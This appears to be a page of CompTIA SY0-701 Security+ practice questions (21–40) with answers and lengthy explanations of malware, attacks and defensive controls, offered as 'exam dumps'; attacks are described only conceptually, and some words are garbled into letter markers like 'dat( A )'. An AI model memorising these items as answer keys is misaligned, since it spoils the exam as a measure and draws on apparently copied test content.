Visit here for our full CompTIA SY0-701 exam dumps and practice test questions.
Question 21
Which type of malware disguises itself as legitimate software to trick users into installing it?
( A ) Worm
( B ) Trojan
( C ) Rootkit
( D ) Spyware
Answer: B
Explanation:
A Trojan is a type of malware that masquerades as legitimate software to deceive users into installing it. Unlike worms, Trojans do not self-replicate but rely on social engineering to spread. They can create backdoors, steal sensitive information, or install additional malicious payloads on the victim’s system. Rootkits, by contrast, aim to conceal malware activity and maintain privileged access without detection. Worms spread automatically across networks, while spyware monitors user activity for data collection purposes. Trojans often appear as harmless applications, software updates, or email attachments, exploiting trust to compromise systems.
Protecting against Trojans requires user education, endpoint protection software, and strict email filtering. Security teams often combine behavioral analysis, sandboxing, and signature-based detection to identify Trojan activity. Organizations should also enforce least privilege, regular patching, and network segmentation to minimize potential damage. Awareness of phishing attacks and suspicious downloads is critical because Trojans exploit human behavior as much as technical vulnerabilities. Advanced Trojans may include keylogging capabilities, cryptocurrency miners, or remote administration tools, making them multifaceted threats. Regular audits, monitoring logs, and threat intelligence sharing enhance organizational defenses, ensuring prompt detection and mitigation of Trojan infections. Implementing layered security, combining network, endpoint, and application-level controls, is the most effective strategy for mitigating Trojan risks.
Question 22
Which attack attempts to overload a system’s resources to make it unavailable to legitimate users?
( A ) Denial-of-service (DoS)
( B ) Brute-force attack
( C ) SQL injection
( D ) Man-in-the-middle attack
Answer: A
Explanation:
Denial-of-service (DoS) attacks aim to overwhelm a system’s resources, making it unavailable to legitimate users. This can involve saturating bandwidth, exhausting memory, or overloading application processes. Distributed denial-of-service (DDoS) attacks use multiple systems, often part of a botnet, to amplify impact. Brute-force attacks, on the other hand, attempt to guess passwords or encryption keys, while SQL injection exploits database input vulnerabilities. Man-in-the-middle attacks intercept communication between two parties, compromising confidentiality and integrity. DoS attacks can target websites, applications, servers, or network infrastructure, disrupting business operations and causing reputational or financial damage.
Mitigation strategies include rate limiting, traffic filtering, and deployment of anti-DDoS appliances or cloud-based services. Monitoring network traffic patterns, anomaly detection, and incident response planning are critical for maintaining service availability. Redundant infrastructure, load balancing, and geographically distributed services also help maintain uptime during attacks. Organizations should also integrate security awareness, continuous monitoring, and threat intelligence to anticipate emerging attack patterns. Understanding DoS vectors, such as SYN floods, ping of death, and HTTP request floods, allows cybersecurity professionals to design proactive defenses and minimize operational impact. Combining preventive, detective, and corrective controls ensures organizations can rapidly respond to DoS threats while preserving essential services.
Question 23
Which cryptographic process verifies that data has not been altered during transmission?
( A ) Encryption
( B ) Hashing
( C ) Digital signature
( D ) Steganography
Answer: B
Explanation:
Hashing is a cryptographic process that converts data into a fixed-length value, known as a hash, to verify data integrity. Unlike encryption, which protects confidentiality, hashing ensures that any modification of the original data can be detected because even a minor change produces a significantly different hash value. Digital signatures combine hashing and asymmetric encryption to provide both integrity and non-repudiation, while steganography conceals information within another medium. Hash functions, such as SHA-256 and MD5, are widely used in data verification, password storage, and digital certificates. In practice, systems calculate a hash of the transmitted data and compare it with the expected hash to ensure integrity. Hashing is also crucial for blockchain technology, secure file verification, and software distribution.
To maintain security, hash functions must be collision-resistant, meaning it should be computationally infeasible for two different inputs to produce the same hash. Combining hashing with other security controls, such as encryption and digital signatures, provides comprehensive protection for sensitive information in transit and at rest. Organizations should implement secure hashing practices, monitor logs for integrity verification, and regularly update algorithms to address vulnerabilities. Proper application of hashing enhances trust, prevents unauthorized modifications, and ensures compliance with regulatory frameworks that require data integrity safeguards.
Question 24
Which type of firewall operates at the application layer and can inspect traffic based on protocols and content?
( A ) Packet-filtering firewall
( B ) Stateful firewall
( C ) Application-layer firewall
( D ) Circuit-level gateway
Answer: C
Explanation:
An application-layer firewall, also referred to as a proxy firewall, functions at the application layer of the OSI model and inspects network traffic in a highly granular manner. Unlike packet-filtering firewalls, which focus solely on header information such as IP addresses, ports, and protocols, or stateful firewalls, which monitor the state and context of active connections, application-layer firewalls examine the actual content of network packets and the behavior of applications. This allows them to understand specific protocols such as HTTP, FTP, SMTP, and others, providing protection against attacks that target the application itself. Circuit-level gateways, by contrast, operate at the session layer and manage TCP or UDP sessions without inspecting the content of the transmitted dat( A )
The deep inspection capabilities of application-layer firewalls make them particularly effective against sophisticated threats such as SQL injection, cross-site scripting (XSS), malware downloads, and other exploits that manipulate application dat( A ) By analyzing traffic for malicious patterns and policy violations, these firewalls can prevent attacks that would bypass traditional network firewalls. They also offer advanced features such as granular access control, user authentication, and content caching, which can improve both security and performance.
Organizations often deploy application-layer firewalls in combination with conventional network firewalls to implement a layered security approach. This multi-layered defense ensures that even if one control is bypassed, others remain in place to mitigate risk. Proper configuration, regular software updates, and comprehensive logging are critical for maintaining the effectiveness of application-layer firewalls. Logs provide visibility into attempted attacks and anomalous traffic, supporting incident response and forensic investigations.
These firewalls are particularly valuable in environments where web-based applications, e-commerce platforms, and other critical business services are in use. The ability to inspect application-specific traffic allows organizations to enforce security policies, protect sensitive information, and comply with regulatory requirements. By filtering and monitoring traffic at the application layer, businesses can enhance their overall security posture, reduce the risk of data breaches, and ensure that their digital services operate safely and reliably.
Question 25
Which principle enforces that critical tasks are divided among multiple users to reduce risk of fraud or errors?
( A ) Least privilege
( B ) Separation of duties
( C ) Need-to-know
( D ) Role-based access control
Answer: B
Explanation:
Separation of duties is a fundamental security principle aimed at reducing the risk of fraud, errors, and misuse by distributing critical responsibilities among multiple individuals. By ensuring that no single person possesses the authority to perform sensitive operations independently, organizations can limit the potential for unauthorized actions or mistakes that could compromise security, financial integrity, or operational reliability. Unlike least privilege, which restricts users to only the access required for their roles, or need-to-know policies, which limit information access to what is strictly necessary, separation of duties focuses on the division of tasks and responsibilities to create checks and balances within processes. Role-based access control (RBAC) can complement separation of duties by assigning permissions based on predefined roles, ensuring that responsibilities are appropriately segmented across staff members.
This principle is especially important in areas such as finance, administration, and information technology, where critical tasks often involve sensitive approvals, execution of transactions, or system configuration changes. By distributing responsibilities, organizations reduce the likelihood of both accidental errors and deliberate malicious activities. For instance, in financial operations, one employee may initiate a payment, a second employee may approve it, and a third may reconcile the records. This layering ensures that no single point of failure exists and that each action is subject to oversight, creating accountability and transparency in processes.
Implementing separation of duties can be enhanced through automated workflows, comprehensive logging, and regular auditing. Automated systems help enforce task segregation consistently, while logs provide visibility into user actions and facilitate investigations if discrepancies arise. Auditing ensures compliance with regulatory frameworks, such as Sarbanes-Oxley, HIPAA, and PCI DSS, by verifying that responsibilities are properly divided and executed.
Question 26
Which attack method involves intercepting and potentially altering communication between two parties?
( A ) Man-in-the-middle attack
( B ) Dictionary attack
( C ) Phishing attack
( D ) Botnet attack
Answer: A
Explanation:
A man-in-the-middle (MITM) attack is a type of cybersecurity threat in which an attacker secretly intercepts and potentially alters communication between two parties without their knowledge. The attacker positions themselves between the sender and receiver, allowing them to eavesdrop on sensitive information, such as login credentials, financial details, or personal data, and in some cases manipulate the communication by injecting malicious content. Unlike dictionary attacks, which rely on automated attempts to guess passwords from predefined lists, or phishing attacks, which trick users into voluntarily revealing sensitive information, MITM attacks directly compromise the confidentiality and integrity of data in transit. Botnets, on the other hand, focus on automating attacks or coordinating malware distribution rather than intercepting communications.
MITM attacks often exploit weaknesses in communication protocols, poorly configured encryption, or unsecured networks, such as public Wi-Fi hotspots, where attackers can more easily intercept traffi( C ) Common techniques include DNS spoofing, ARP poisoning, and SSL/TLS session hijacking. These attacks can remain undetected unless proper monitoring and security measures are in place, making them particularly dangerous in corporate networks or public environments where sensitive information is transmitted.
Preventing MITM attacks requires a combination of technical and organizational measures. Strong encryption protocols like TLS/HTTPS help protect the data during transit, while mutual authentication ensures that both parties verify each other’s identity. Using secure virtual private networks (VPNs) can safeguard communication over untrusted networks. Organizations should also deploy intrusion detection and prevention systems (IDS/IPS) to monitor for suspicious network activity and anomalies that could indicate MITM attempts. Additionally, validating digital certificates and maintaining proper network configurations are essential to ensure secure communications.
Question 27
Which type of attack involves an attacker continuously attempting multiple password combinations to gain access?
( A ) Brute-force attack
( B ) Cross-site scripting
( C ) Denial-of-service
( D ) Spoofing attack
Answer: A
Explanation:
A brute-force attack is a cybersecurity technique in which an attacker attempts to gain unauthorized access to a system by systematically trying every possible combination of passwords or cryptographic keys. This method relies entirely on computational power and algorithmic guessing rather than exploiting human psychology, as in social engineering or phishing attacks. While brute-force attacks do not require tricking users, they can be highly effective against weak or commonly used passwords and poorly protected systems. Other types of attacks, such as cross-site scripting, focus on injecting malicious scripts into web pages to steal data or perform unauthorized actions, denial-of-service attacks aim to overwhelm system resources to disrupt availability, and spoofing attacks involve impersonating trusted entities to deceive victims.
Brute-force attacks can be executed using simple scripts, automated tools, or advanced methods that leverage GPU-based parallel processing to rapidly test large numbers of password combinations. Attackers often use dictionaries containing common passwords or precomputed rainbow tables to speed up the guessing process. The effectiveness of brute-force attacks is directly influenced by the complexity and length of the passwords, the security measures in place, and the system’s response to repeated login attempts.
Organizations can implement multiple measures to mitigate the risk of brute-force attacks. Strong and complex passwords that include a combination of uppercase and lowercase letters, numbers, and symbols significantly increase the time required for a successful attack. Account lockout policies that temporarily disable accounts after multiple failed attempts help prevent automated guessing. Multi-factor authentication adds an additional layer of security by requiring something the user has or knows, making it harder for attackers to gain access even if the password is compromised. Rate-limiting login attempts, monitoring for unusual access patterns, and deploying intrusion detection systems enhance protection. Proper password management, including hashing, salting, and secure storage, further reduces vulnerabilities.
Question 28
Which security principle ensures users access only the data necessary for their job responsibilities?
( A ) Separation of duties
( B ) Need-to-know
( C ) Defense in depth
( D ) Non-repudiation
Answer: B
Explanation:
The need-to-know principle is a fundamental security concept that restricts access to information strictly based on whether it is necessary for an individual to perform their job responsibilities. Under this principle, users are granted access only to the data, resources, or systems that are essential for their specific roles, reducing the risk of unnecessary exposure or misuse of sensitive information. By limiting access in this way, organizations strengthen the confidentiality of critical data and minimize the potential for insider threats or accidental leaks.
The need-to-know principle works in conjunction with other access control mechanisms, such as the principle of least privilege and role-based access control (RBAC). While least privilege ensures users have only the minimum permissions required to perform their duties, need-to-know further narrows access by considering whether the user has a legitimate requirement for specific information. RBAC supports this by grouping permissions according to job functions, allowing need-to-know restrictions to be applied more effectively within defined roles. Other security principles, such as separation of duties, defense in depth, and non-repudiation, complement need-to-know by providing additional layers of protection, accountability, and oversight.
Implementing the need-to-know principle requires careful planning, including proper classification of information, defining access policies, and applying technical controls such as authentication, authorization, and logging mechanisms. Access should be granted on a case-by-case basis, regularly reviewed through audits, and promptly revoked when it is no longer necessary. Continuous monitoring ensures that any unauthorized attempts to access restricted information are detected and addressed quickly.
This principle is particularly critical in industries that handle highly sensitive data, including healthcare, finance, and government operations. By enforcing need-to-know, organizations can prevent unauthorized disclosure, safeguard personal or proprietary information, and maintain compliance with regulatory requirements such as HIPAA, GDPR, and PCI DSS. Combining need-to-know with encryption, strong authentication, and robust logging ensures that sensitive information remains secure while supporting operational efficiency and maintaining accountability across the organization.
Question 29
Which type of attack involves embedding malicious scripts into web pages that execute on a victim’s browser?
( A ) Cross-site scripting (XSS)
( B ) SQL injection
( C ) Phishing
( D ) Clickjacking
Answer: A
Explanation:
Cross-site scripting (XSS) is a common web security vulnerability that occurs when attackers inject malicious scripts into web pages viewed by unsuspecting users. When a victim loads a page containing such a script, it executes in their browser, often without their knowledge. This can allow attackers to steal sensitive information, such as cookies, session tokens, or authentication credentials, which may then be used to impersonate the user or gain unauthorized access to web applications. In some cases, XSS can also enable attackers to perform actions on behalf of the user, modify web content, or deliver malware, significantly compromising both the integrity and confidentiality of user interactions.
XSS attacks are categorized into different types. Persistent, or stored, XSS occurs when malicious scripts are permanently stored on a server, for example in a database, and delivered to multiple users over time. Reflected XSS occurs when a malicious script is immediately executed after a user interacts with a crafted link or submits input to a vulnerable web application. Both types exploit weaknesses in input validation or improper handling of user-generated content. Other attack vectors, such as SQL injection, specifically target database queries, while phishing and clickjacking rely on social engineering techniques rather than exploiting technical vulnerabilities.
Preventing XSS requires a combination of secure coding practices and defensive measures. Proper input validation ensures that user-supplied data is checked and sanitized before processing, while output encoding prevents malicious scripts from being executed in a browser. Implementing a content security policy (CSP) can further limit which scripts are allowed to run on a page, providing an additional safeguard. Regular security testing, including automated scanning and penetration testing, helps identify and remediate vulnerabilities before attackers can exploit them.
Organizations should also monitor web traffic, application logs, and alerts to detect potential XSS attempts. Educating developers about secure coding and end users about safe browsing habits enhances overall protection. By combining preventive, detective, and corrective controls, organizations can effectively reduce the risk of XSS attacks, protect sensitive user data, and maintain trust in their web applications and services.
Question 30
Which authentication factor relies on physical characteristics like fingerprints or retina scans?
( A ) Knowledge-based authentication
( B ) Biometric authentication
( C ) Possession-based authentication
( D ) Token-based authentication
Answer: B
Explanation:
Biometric authentication is a security method that verifies an individual’s identity based on unique physical or behavioral characteristics. Common biometric traits include fingerprints, facial features, iris or retina patterns, voice recognition, and even behavioral patterns such as typing rhythm or gait. These traits are captured, converted into digital templates, and compared against stored records to determine whether the person attempting access is legitimate. Unlike traditional knowledge-based authentication, which relies on something a user knows like a password or PIN, or possession-based authentication, which depends on a physical device like a smart card or hardware token, biometrics provides a factor that is inherently tied to the individual and is generally difficult to duplicate or share.
Biometric authentication is often used as part of multi-factor authentication (MFA), combining it with passwords, PINs, or security tokens to enhance overall security. By including a biometric factor, organizations reduce reliance on passwords alone, which can be guessed, stolen, or reused across multiple accounts. Biometric systems are widely employed across mobile devices, secure facilities, financial services, and enterprise environments, where high assurance of identity is critical. For instance, smartphones use fingerprint or facial recognition to unlock devices, while corporate systems may require iris scans or fingerprint verification to access sensitive areas or databases.
Effective biometric implementation requires attention to security and privacy. Templates must be stored securely, often in encrypted form, to prevent unauthorized access or misuse. Liveness detection is important to ensure that biometric inputs are from a live person rather than a photo, video, or artificial replic( A ) Additionally, systems must comply with privacy regulations, such as GDPR, which mandate careful handling of personal biometric dat( A ) Biometric solutions must also address potential spoofing attacks, such as fake fingerprints or facial masks, through continuous monitoring and advanced detection techniques.
Combining biometrics with other authentication factors strengthens security without sacrificing usability. It increases confidence in identity verification, reduces the risk of unauthorized access, and enhances operational efficiency by streamlining login or verification processes. Organizations implementing biometric authentication benefit from improved access control, better protection of sensitive information, and a more robust overall security posture. Regular auditing, monitoring, and updates are essential to maintain trust and effectiveness over time, ensuring that the system remains resilient against evolving threats.
Question 31
Which type of malware can hide its presence by modifying system processes and files to evade detection?
( A ) Trojan
( B ) Rootkit
( C ) Worm
( D ) Adware
Answer: B
Explanation:
A rootkit is an advanced form of malware specifically designed to hide its presence on an infected system while providing attackers with privileged access, often at the administrative or root level. Unlike Trojans, which require user action to execute, rootkits are engineered to operate stealthily, manipulating core system functions, files, and processes to remain undetectable. They can infiltrate operating systems, drivers, or even firmware, making them particularly difficult to identify and remove. Worms, by comparison, are self-replicating and propagate across networks without requiring direct user interaction, while adware primarily delivers unwanted advertisements and typically does not provide unauthorized system access.
Rootkits pose a significant challenge because they actively interfere with security mechanisms and monitoring tools. They may intercept system calls, hide malicious processes, mask files, and disable antivirus programs or firewalls, effectively evading detection. Traditional antivirus solutions often fail to identify rootkits due to their deep integration into system components, which is why advanced detection methods are required. Behavior-based monitoring, memory analysis, integrity checking, and forensic examination of system activity are essential techniques for identifying rootkit infections.
These malware programs are usually introduced through methods such as phishing emails, malicious downloads, compromised software, or by exploiting vulnerabilities in the operating system or installed applications. Once installed, rootkits can operate alongside other forms of malware, including keyloggers, backdoors, or spyware, enabling attackers to maintain persistent access, steal sensitive data, and execute commands remotely without alerting the user. The stealthy nature of rootkits allows attackers to establish long-term control over compromised systems, posing risks to both data integrity and overall network security.
Mitigating rootkit threats involves a combination of proactive and reactive measures. Maintaining up-to-date operating systems and software patches reduces exploitable vulnerabilities. Endpoint detection and response (EDR) solutions, continuous monitoring, and rigorous auditing help identify suspicious activity early. In severe cases, complete system reimaging or reinstalling the operating system may be necessary to fully eradicate the rootkit. Implementing strict access controls, logging critical system events, and deploying layered security defenses are crucial to minimizing the likelihood of infection. Understanding rootkits and their behaviors is essential for cybersecurity professionals, as these threats undermine both system integrity and trust, making effective prevention, detection, and remediation strategies vital for organizational security.
Question 32
Which type of cyberattack involves inserting malicious SQL statements into input fields to manipulate a database?
( A ) SQL injection
( B ) Cross-site scripting
( C ) Directory traversal
( D ) Man-in-the-middle
Answer: A
Explanation:
SQL injection is a type of cyberattack in which an attacker inserts malicious SQL commands into input fields of a web application to manipulate the underlying database. This occurs when applications fail to properly validate or sanitize user input, allowing unauthorized commands to be executed on the database server. SQL injection can be used to bypass authentication mechanisms, retrieve sensitive information such as usernames, passwords, and financial records, modify or delete data, and even gain administrative access to the database. Unlike attacks that target end users directly, such as cross-site scripting (XSS), SQL injection focuses on compromising the backend system itself. Other types of attacks, like directory traversal, attempt to access restricted files on a server, while man-in-the-middle attacks intercept communication between two parties.
SQL injection is particularly dangerous because it can compromise the core principles of information security: confidentiality, integrity, and availability. Attackers can extract confidential data, alter database contents, or even render systems unusable. Effective mitigation requires a multi-layered approach that combines secure development practices, proper configuration, and ongoing monitoring. Input validation is a key preventive measure, ensuring that user input conforms to expected formats. Using parameterized queries or prepared statements prevents attackers from injecting executable SQL, while stored procedures can further control database interactions. Applying the principle of least privilege to database accounts reduces the potential impact of a successful injection by limiting what an attacker can access.
Organizations should also implement regular code reviews, security testing, and vulnerability scanning to identify injection flaws before they can be exploited. Logging and monitoring database activity help detect suspicious behavior in real time, enabling rapid response to potential attacks. Educating developers on secure coding practices and keeping systems and frameworks up to date further reduce the risk of SQL injection. By combining preventive, detective, and corrective measures, organizations can protect sensitive information, maintain the integrity of their data, and minimize operational and reputational damage resulting from SQL injection attacks.
Question 33
Which authentication method generates a time-sensitive, one-time code for login verification?
( A ) Password authentication
( B ) One-time password (OTP)
( C ) Biometric authentication
( D ) Security token
Answer: B
Explanation:
A one-time password (OTP) is a form of authentication that provides a unique, temporary code for verifying a user’s identity during login or transaction processes. Unlike traditional static passwords, which remain the same until changed by the user, OTPs are valid for a very limited time, usually ranging from 30 to 60 seconds. This short lifespan makes OTPs highly effective at preventing replay attacks, credential theft, and unauthorized access that can occur when passwords are reused across multiple systems. While conventional password-based authentication relies solely on something the user knows, OTPs add a dynamic factor that requires possession of a device or access to a delivery channel, enhancing overall security.
OTPs are commonly generated and delivered through a variety of mechanisms. Hardware tokens can display the OTP on a small device, while software-based solutions, such as mobile authenticator apps, generate codes using time-based or event-based algorithms. In some cases, OTPs are sent via SMS or email, though these methods may carry certain security risks, such as interception. OTPs are often used as a component of multi-factor authentication (MFA), combining them with passwords or biometrics to create multiple layers of verification. This combination significantly reduces the likelihood of successful attacks, including phishing, brute-force attempts, and credential-stuffing attacks, by ensuring that even if one factor is compromised, the attacker cannot gain access without the OTP.
The underlying mechanisms for OTP generation rely on synchronized clocks, cryptographic algorithms, or challenge-response protocols, ensuring that each password is unique and valid only for a defined period. Organizations frequently use OTPs to secure remote access systems, financial transactions, enterprise applications, and sensitive corporate systems. Effective implementation requires secure transmission of OTPs, monitoring for suspicious activity, and integration with account lockout policies to prevent misuse. Additionally, OTPs help organizations comply with regulatory and industry standards in sectors such as finance, healthcare, and government, providing a reliable and practical method for securing digital access while enhancing user trust and operational security.
Question 34
Which protocol provides secure remote command-line access to devices over an unsecured network?
( A ) Telnet
( B ) Secure Shell (SSH)
( C ) FTP
( D ) HTTP
Answer: B
Explanation:
Secure Shell (SSH) is a widely used cryptographic protocol that enables secure remote access and management of computers, servers, and network devices over unsecured networks. Unlike legacy protocols such as Telnet, which transmit login credentials and data in plaintext, SSH encrypts all communication, protecting sensitive information from interception, eavesdropping, session hijacking, and data tampering. While other protocols like FTP and HTTP serve specific functions—FTP for file transfers and HTTP for web-based communication—they do not provide inherent encryption, leaving transmitted data vulnerable. SSH ensures both authentication and confidentiality, using methods such as password-based authentication, public key cryptography, or multi-factor authentication to verify user identities securely.
In addition to secure remote command-line access, SSH supports advanced features such as secure tunneling, port forwarding, and file transfers via SFTP, which encrypts data in transit to prevent unauthorized access. Network administrators rely on SSH to perform critical operations, including server management, configuration of routers and switches, firewall administration, and execution of scripts, all while maintaining the integrity and confidentiality of the session. SSH also enables automation of secure tasks, including backups and deployment processes, enhancing operational efficiency while reducing security risks associated with manual intervention.
To maintain a robust security posture, organizations implement best practices such as disabling direct root login, enforcing strong cryptographic key pairs, restricting access through firewalls, and continuously monitoring SSH logs for unusual activity. Regular SSH key rotation, multi-factor authentication enforcement, and limiting connections to known hosts further mitigate the risks of credential compromise and unauthorized access. By combining these controls with proper network segmentation and monitoring, organizations can prevent attacks such as brute-force attempts, unauthorized remote access, and malware propagation via compromised accounts.
SSH has become a foundational element of enterprise security strategies, particularly in environments that require secure remote administration, sensitive data handling, and automated processes. A thorough understanding of SSH’s cryptographic mechanisms, combined with strict access controls and monitoring, allows organizations to maintain secure remote operations while minimizing exposure to cybersecurity threats. Properly implemented, SSH ensures that sensitive administrative tasks are executed securely, reinforcing both system integrity and organizational trust.
Question 35
Which type of security control aims to detect and respond to threats after they occur?
( A ) Preventive control
( B ) Detective control
( C ) Corrective control
( D ) Deterrent control
Answer: B
Explanation:
Detective controls are security measures implemented to identify and alert organizations to unauthorized activities, security breaches, or other suspicious events after they occur. Unlike preventive controls, which are designed to stop incidents before they happen, detective controls focus on monitoring, observing, and detecting activities that could indicate a security compromise. Common examples of detective controls include intrusion detection systems (IDS), log monitoring and analysis, audit trails, and continuous security event monitoring. While corrective controls aim to remediate the effects of an incident and deterrent controls are intended to discourage malicious behavior through visible warnings or policies, detective controls provide organizations with crucial visibility into ongoing or past security events, enabling timely investigation and response.
Detective controls play a vital role in incident response processes. By collecting and analyzing data from networks, systems, and applications, these controls help security teams identify attack patterns, compromised assets, and exploited vulnerabilities. This information is essential for containing breaches, minimizing damage, and implementing appropriate corrective actions. Modern detective controls often leverage automated technologies such as Security Information and Event Management (SIEM) systems, anomaly detection tools, and behavioral analytics to monitor large volumes of activity in real time. These systems can correlate events across multiple sources, detect unusual behavior, and generate alerts that guide security teams to potential threats. Human oversight remains critical, however, to interpret complex signals, investigate anomalies, and determine appropriate responses.
Maintaining effective detective controls requires continuous monitoring, regular updates of detection signatures, integration of threat intelligence, and periodic audits to ensure coverage across the organization’s infrastructure. These controls also support compliance with regulatory frameworks by documenting monitoring efforts and demonstrating timely response to incidents. While they do not prevent attacks directly, detective controls are essential for reducing the overall impact of security incidents, improving situational awareness, and informing improvements to preventive measures. When integrated into a layered security strategy alongside preventive and corrective controls, detective mechanisms significantly enhance an organization’s ability to manage threats, maintain operational resilience, and protect critical information assets.
Question 36
Which attack attempts to trick users into divulging sensitive information through fraudulent communication?
( A ) Phishing
( B ) SQL injection
( C ) Denial-of-service
( D ) Man-in-the-middle
Answer: A
Explanation:
Phishing is a type of social engineering attack in which cybercriminals manipulate users into disclosing sensitive information, such as login credentials, financial details, or personal dat( A ) Attackers typically use deceptive communication channels, including emails, text messages, instant messaging, or counterfeit websites that closely mimic legitimate services. Unlike purely technical attacks, phishing relies heavily on human psychology, exploiting trust, urgency, curiosity, or fear to convince targets to act without careful scrutiny. While other attacks such as SQL injection target databases, denial-of-service attacks disrupt system availability, and man-in-the-middle attacks intercept communications, phishing focuses on tricking users into voluntarily providing valuable information.
There are several variations of phishing attacks, each tailored to different objectives and targets. Spear-phishing, for example, is highly targeted and directed at specific individuals or organizations, often leveraging personal or professional details to increase credibility. Whaling attacks specifically aim at high-level executives or key decision-makers, seeking access to critical business systems or confidential information. Clone phishing involves creating a nearly identical copy of a legitimate message previously sent to the target, substituting malicious links or attachments. These variations demonstrate the adaptability of phishing tactics, which can combine technical deception with psychological manipulation to achieve their goals.
Organizations can take multiple measures to prevent phishing attacks and reduce associated risks. User education and awareness training are critical, teaching individuals to recognize suspicious messages, verify sources, and avoid unsafe actions. Technical solutions, such as email filtering, anti-phishing software, multi-factor authentication, and web content inspection, further mitigate exposure. Monitoring for anomalous activity, such as unusual login attempts or suspicious domains, helps detect potential compromises early. Incident response procedures are also essential, ensuring that any successful phishing attempts are contained quickly and remediated effectively.
Question 37
Which encryption method uses the same key for both encryption and decryption of data?
( A ) Symmetric encryption
( B ) Asymmetric encryption
( C ) Hashing
( D ) Digital signature
Answer: A
Explanation:
Symmetric encryption is a cryptographic method that uses a single key for both encrypting and decrypting data, making it a highly efficient and fast way to protect information. The sender uses the same key to convert plaintext into ciphertext, and the recipient uses that exact key to reverse the process and recover the original dat( A ) Because only one key is involved, symmetric encryption is well-suited for encrypting large volumes of data and is commonly used in secure file storage, data transmission, and communication protocols such as the Advanced Encryption Standard (AES). Its speed and low computational overhead make it ideal for scenarios where performance is a critical concern.
However, the effectiveness of symmetric encryption relies heavily on secure key distribution. If the key is intercepted or exposed, the confidentiality of the data is compromised, as anyone with access to the key can decrypt the information. To mitigate this risk, organizations must implement robust key management strategies, which include securely generating, distributing, storing, rotating, and eventually retiring keys. Access to encryption keys should be tightly controlled and limited to authorized personnel, with regular audits and monitoring to detect any unauthorized use.
In contrast to symmetric encryption, asymmetric encryption uses a pair of keys—a public key for encryption and a private key for decryption—eliminating the need to share a single secret key. Hashing, another cryptographic technique, does not encrypt data but produces a fixed-size digest to verify data integrity. Digital signatures often combine hashing with asymmetric encryption to ensure authenticity and non-repudiation. Symmetric encryption is often implemented alongside these methods in layered cryptographic systems to provide comprehensive security.
The security of symmetric algorithms is assessed based on their resistance to attacks, including brute-force attempts, as well as their computational efficiency and overall cryptographic strength. When combined with proper key management, secure protocols, and complementary cryptographic measures, symmetric encryption provides a reliable means of maintaining data confidentiality. Understanding the principles of symmetric encryption, including key lifecycle management and secure implementation practices, is essential for organizations to protect sensitive information, maintain trust, and comply with data protection regulations in enterprise environments.
Question 38
Which type of attack manipulates DNS responses to redirect users to malicious websites?
( A ) DNS poisoning
( B ) ARP spoofing
( C ) Cross-site scripting
( D ) SQL injection
Answer: A
Explanation:
DNS poisoning, also known as DNS spoofing, manipulates Domain Name System responses to redirect users to malicious websites without their knowledge. Attackers compromise DNS records, cache, or resolvers, causing legitimate domain requests to resolve to attacker-controlled IP addresses. ARP spoofing targets MAC-IP mappings, XSS injects malicious scripts into web pages, and SQL injection exploits database queries. DNS poisoning can facilitate phishing, malware delivery, and credential theft. Preventive measures include DNSSEC implementation, monitoring DNS traffic for anomalies, patching DNS servers, and restricting recursive queries. Organizations should also employ threat intelligence feeds to detect malicious domains and maintain endpoint protection. Awareness campaigns for users help prevent accidental disclosure of sensitive information. Effective mitigation requires a combination of network security controls, robust DNS configuration, logging, and proactive incident response. DNS poisoning poses severe risks to organizational security and trust because it exploits a fundamental internet infrastructure service. Proper management and layered defenses reduce exposure and enhance resilience against these attacks.
Question 39
Which type of social engineering attack involves attackers posing as technical support to gain access?
( A ) Vishing
( B ) Tailgating
( C ) Pretexting
( D ) Pharming
Answer: C
Explanation:
Pretexting is a social engineering attack where attackers create a fabricated scenario to gain trust and manipulate individuals into revealing sensitive information or performing unauthorized actions. Posing as technical support or authority figures is a common tacti( C ) Vishing uses phone calls to deceive victims, tailgating involves physical access by following authorized personnel, and pharming redirects users to fraudulent websites. Pretexting relies on psychological manipulation, credibility, and perceived legitimacy. Attackers often research targets to craft convincing narratives. Preventive measures include user awareness training, verification protocols, and strict identity verification procedures. Organizations should encourage reporting suspicious requests and implement multi-factor authentication to reduce risk. Monitoring communications, auditing access, and maintaining clear policies further mitigate the threat. Pretexting exploits human behavior more than technical weaknesses, making education and vigilance essential in defending against these attacks. By combining procedural controls, security awareness, and technical measures, organizations reduce exposure to pretexting-based compromise.
Question 40
Which type of attack aims to hijack a user session after authentication without knowing login credentials?
( A ) Session hijacking
( B ) Brute-force attack
( C ) Phishing
( D ) SQL injection
Answer: A
Explanation:
Session hijacking occurs when an attacker gains unauthorized access to an active user session after authentication, without needing to know the login credentials. This can involve stealing session cookies, session IDs, or exploiting unsecured network protocols. Brute-force attacks attempt credential guessing, phishing relies on social engineering, and SQL injection manipulates database queries. Session hijacking undermines confidentiality and integrity, enabling attackers to impersonate legitimate users and perform unauthorized actions. Preventive measures include using secure cookies, HTTPS, session expiration, multi-factor authentication, and monitoring for abnormal activity. Organizations should implement network segmentation, intrusion detection, and secure session management practices. Attackers may exploit vulnerabilities in web applications, client systems, or network communication, emphasizing the need for comprehensive security strategies. Detecting and mitigating session hijacking requires combining preventive, detective, and corrective controls. By securing session tokens, enforcing strict session management, and educating users about phishing and social engineering risks, organizations can minimize exposure to session hijacking attacks while maintaining operational trust and compliance.
